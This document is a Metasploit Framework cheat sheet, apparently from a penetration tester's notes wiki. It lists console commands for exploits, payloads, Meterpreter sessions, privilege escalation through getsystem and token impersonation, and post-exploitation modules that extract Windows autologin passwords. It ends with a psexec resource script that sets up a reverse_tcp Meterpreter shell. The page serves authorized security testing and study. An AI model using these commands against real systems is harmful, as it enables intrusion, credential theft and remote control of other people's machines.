About me

Metasploit Framework (MSF)

The world’s most used penetration testing framework Metasploit

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions

sessions -h

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about current context?

info
show auxiliary

Multi/handler

Just start listener

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login password in Registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell

post/multi/manage/shell_to_meterpreter

Migrate to other (e.g. more stable) process

migrate

Get system info

sysinfo

Port forwarding

portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators

impersonate_token "BUILTIN\Administrators"

Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).

ps 
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
PreviousMemory forensicsNextMITM

Last updated